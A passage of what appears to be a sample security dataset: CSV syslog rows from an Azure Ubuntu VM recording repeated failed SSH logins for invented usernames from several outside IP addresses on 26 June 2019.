+4232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:39,UbuntuDevEnv,2019-06-26 14:06:38,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 33678:11: Bye Bye [preauth],3612,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,33678,,
+4233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:48,UbuntuDevEnv,2019-06-26 14:06:47,auth,UbuntuDevEnv,info,Invalid user marek from 196.46.36.144 port 53597,3650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marek,196.46.36.1,53597,,
+4234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:48,UbuntuDevEnv,2019-06-26 14:06:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,3650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:48,UbuntuDevEnv,2019-06-26 14:06:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:50,UbuntuDevEnv,2019-06-26 14:06:49,auth,UbuntuDevEnv,info,Failed password for invalid user marek from 196.46.36.144 port 53597 ssh2,3650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marek,196.46.36.1,53597,,
+4237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:50,UbuntuDevEnv,2019-06-26 14:06:49,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 53597:11: Bye Bye [preauth],3650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,53597,,
+4238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:50,UbuntuDevEnv,2019-06-26 14:06:49,auth,UbuntuDevEnv,info,Disconnected from invalid user marek 196.46.36.144 port 53597 [preauth],3650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marek,196.46.36.1,53597,,
+4239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:59,UbuntuDevEnv,2019-06-26 14:06:58,auth,UbuntuDevEnv,info,Invalid user cloudera from 180.76.96.9 port 58916,3691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloudera,180.76.96.9,58916,,
+4240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:59,UbuntuDevEnv,2019-06-26 14:06:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,3691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:06:59,UbuntuDevEnv,2019-06-26 14:06:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:07:01,UbuntuDevEnv,2019-06-26 14:07:00,auth,UbuntuDevEnv,info,Failed password for invalid user cloudera from 180.76.96.9 port 58916 ssh2,3691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloudera,180.76.96.9,58916,,
+4243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:07:01,UbuntuDevEnv,2019-06-26 14:07:00,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 58916:11: Bye Bye [preauth],3691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,58916,,
+4244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:07:01,UbuntuDevEnv,2019-06-26 14:07:00,auth,UbuntuDevEnv,info,Disconnected from invalid user cloudera 180.76.96.9 port 58916 [preauth],3691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloudera,180.76.96.9,58916,,
+4245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:07:43,UbuntuDevEnv,2019-06-26 14:07:43,auth,UbuntuDevEnv,info,Invalid user tom from 180.76.96.9 port 35784,3856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,180.76.96.9,35784,,
+4246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:07:43,UbuntuDevEnv,2019-06-26 14:07:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:07:43,UbuntuDevEnv,2019-06-26 14:07:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,3856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:07:46,UbuntuDevEnv,2019-06-26 14:07:45,auth,UbuntuDevEnv,info,Failed password for invalid user tom from 180.76.96.9 port 35784 ssh2,3856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,180.76.96.9,35784,,
+4249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:07:46,UbuntuDevEnv,2019-06-26 14:07:45,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 35784:11: Bye Bye [preauth],3856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,35784,,
+4250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:07:46,UbuntuDevEnv,2019-06-26 14:07:45,auth,UbuntuDevEnv,info,Disconnected from invalid user tom 180.76.96.9 port 35784 [preauth],3856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tom,180.76.96.9,35784,,
+4251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:03,UbuntuDevEnv,2019-06-26 14:08:02,auth,UbuntuDevEnv,info,Invalid user trineehuang from 68.183.50.149 port 50626,3929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trineehuang,68.183.50.1,50626,,
+4252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:03,UbuntuDevEnv,2019-06-26 14:08:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:03,UbuntuDevEnv,2019-06-26 14:08:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,3929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:05,UbuntuDevEnv,2019-06-26 14:08:04,auth,UbuntuDevEnv,info,Failed password for invalid user trineehuang from 68.183.50.149 port 50626 ssh2,3929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trineehuang,68.183.50.1,50626,,
+4255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:05,UbuntuDevEnv,2019-06-26 14:08:04,auth,UbuntuDevEnv,info,Disconnected from invalid user trineehuang 68.183.50.149 port 50626 [preauth],3929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trineehuang,68.183.50.1,50626,,
+4256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:05,UbuntuDevEnv,2019-06-26 14:08:04,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 50626:11: Bye Bye [preauth],3929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,50626,,
+4257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:27,UbuntuDevEnv,2019-06-26 14:08:27,auth,UbuntuDevEnv,info,Invalid user cible from 180.76.96.9 port 40886,4008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cible,180.76.96.9,40886,,
+4258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:27,UbuntuDevEnv,2019-06-26 14:08:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:27,UbuntuDevEnv,2019-06-26 14:08:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,4008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:29,UbuntuDevEnv,2019-06-26 14:08:29,auth,UbuntuDevEnv,info,Failed password for invalid user cible from 180.76.96.9 port 40886 ssh2,4008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cible,180.76.96.9,40886,,
+4261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:30,UbuntuDevEnv,2019-06-26 14:08:29,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 40886:11: Bye Bye [preauth],4008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,40886,,
+4262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:08:30,UbuntuDevEnv,2019-06-26 14:08:29,auth,UbuntuDevEnv,info,Disconnected from invalid user cible 180.76.96.9 port 40886 [preauth],4008,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cible,180.76.96.9,40886,,
+4263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:51,UbuntuDevEnv,2019-06-26 14:09:50,auth,UbuntuDevEnv,info,Invalid user pul from 180.76.96.9 port 51086,4312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,180.76.96.9,51086,,
+4264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:51,UbuntuDevEnv,2019-06-26 14:09:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:51,UbuntuDevEnv,2019-06-26 14:09:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,4312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:53,UbuntuDevEnv,2019-06-26 14:09:53,auth,UbuntuDevEnv,info,Failed password for invalid user pul from 180.76.96.9 port 51086 ssh2,4312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,180.76.96.9,51086,,
+4267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:53,UbuntuDevEnv,2019-06-26 14:09:53,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 51086:11: Bye Bye [preauth],4312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,51086,,
+4268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:53,UbuntuDevEnv,2019-06-26 14:09:53,auth,UbuntuDevEnv,info,Disconnected from invalid user pul 180.76.96.9 port 51086 [preauth],4312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,180.76.96.9,51086,,
+4269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:10:39,UbuntuDevEnv,2019-06-26 14:10:38,auth,UbuntuDevEnv,info,Invalid user murai2 from 180.76.96.9 port 56190,4472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai2,180.76.96.9,56190,,
+4270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:10:39,UbuntuDevEnv,2019-06-26 14:10:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,4472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:10:39,UbuntuDevEnv,2019-06-26 14:10:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:10:42,UbuntuDevEnv,2019-06-26 14:10:41,auth,UbuntuDevEnv,info,Failed password for invalid user murai2 from 180.76.96.9 port 56190 ssh2,4472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai2,180.76.96.9,56190,,
+4273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:10:42,UbuntuDevEnv,2019-06-26 14:10:41,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 56190:11: Bye Bye [preauth],4472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,56190,,
+4274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:10:42,UbuntuDevEnv,2019-06-26 14:10:41,auth,UbuntuDevEnv,info,Disconnected from invalid user murai2 180.76.96.9 port 56190 [preauth],4472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai2,180.76.96.9,56190,,
+4275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:07,UbuntuDevEnv,2019-06-26 14:11:07,auth,UbuntuDevEnv,info,Invalid user smon from 68.183.50.149 port 56306,4583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smon,68.183.50.1,56306,,
+4276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:07,UbuntuDevEnv,2019-06-26 14:11:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:07,UbuntuDevEnv,2019-06-26 14:11:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,4583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:09,UbuntuDevEnv,2019-06-26 14:11:09,auth,UbuntuDevEnv,info,Failed password for invalid user smon from 68.183.50.149 port 56306 ssh2,4583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smon,68.183.50.1,56306,,
+4279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:09,UbuntuDevEnv,2019-06-26 14:11:09,auth,UbuntuDevEnv,info,Disconnected from invalid user smon 68.183.50.149 port 56306 [preauth],4583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,smon,68.183.50.1,56306,,
+4280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:09,UbuntuDevEnv,2019-06-26 14:11:09,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 56306:11: Bye Bye [preauth],4583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,56306,,
+4281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:20,UbuntuDevEnv,2019-06-26 14:11:20,auth,UbuntuDevEnv,info,Did not receive identification string from 180.76.96.9 port 33056,4625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,33056,,
+4282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:48,UbuntuDevEnv,2019-06-26 14:17:48,auth,UbuntuDevEnv,info,Invalid user arkserver from 220.134.138.111 port 41312,6131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arkserver,220.134.138.1,41312,,
+4283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:48,UbuntuDevEnv,2019-06-26 14:17:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,6131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:48,UbuntuDevEnv,2019-06-26 14:17:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:50,UbuntuDevEnv,2019-06-26 14:17:49,auth,UbuntuDevEnv,info,Invalid user gitlab from 180.76.96.9 port 50770,6128,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gitlab,180.76.96.9,50770,,
+4286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:50,UbuntuDevEnv,2019-06-26 14:17:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6128,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4287,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:50,UbuntuDevEnv,2019-06-26 14:17:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,6128,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4288,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:51,UbuntuDevEnv,2019-06-26 14:17:50,auth,UbuntuDevEnv,info,Failed password for invalid user arkserver from 220.134.138.111 port 41312 ssh2,6131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arkserver,220.134.138.1,41312,,
+4289,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:51,UbuntuDevEnv,2019-06-26 14:17:50,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 41312:11: Bye Bye [preauth],6131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,41312,,
+4290,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:51,UbuntuDevEnv,2019-06-26 14:17:50,auth,UbuntuDevEnv,info,Disconnected from invalid user arkserver 220.134.138.111 port 41312 [preauth],6131,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arkserver,220.134.138.1,41312,,
+4291,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:17:52,UbuntuDevEnv,2019-06-26 14:17:51,auth,UbuntuDevEnv,info,Failed password for invalid user gitlab from 180.76.96.9 port 50770 ssh2,6128,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gitlab,180.76.96.9,50770,,
